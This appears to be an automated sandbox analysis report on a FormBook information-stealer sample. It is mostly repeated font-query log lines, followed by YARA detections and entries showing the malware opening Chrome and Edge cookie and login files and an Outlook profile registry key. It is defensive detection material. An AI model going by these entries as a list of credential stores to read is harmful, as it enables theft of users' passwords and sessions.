            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
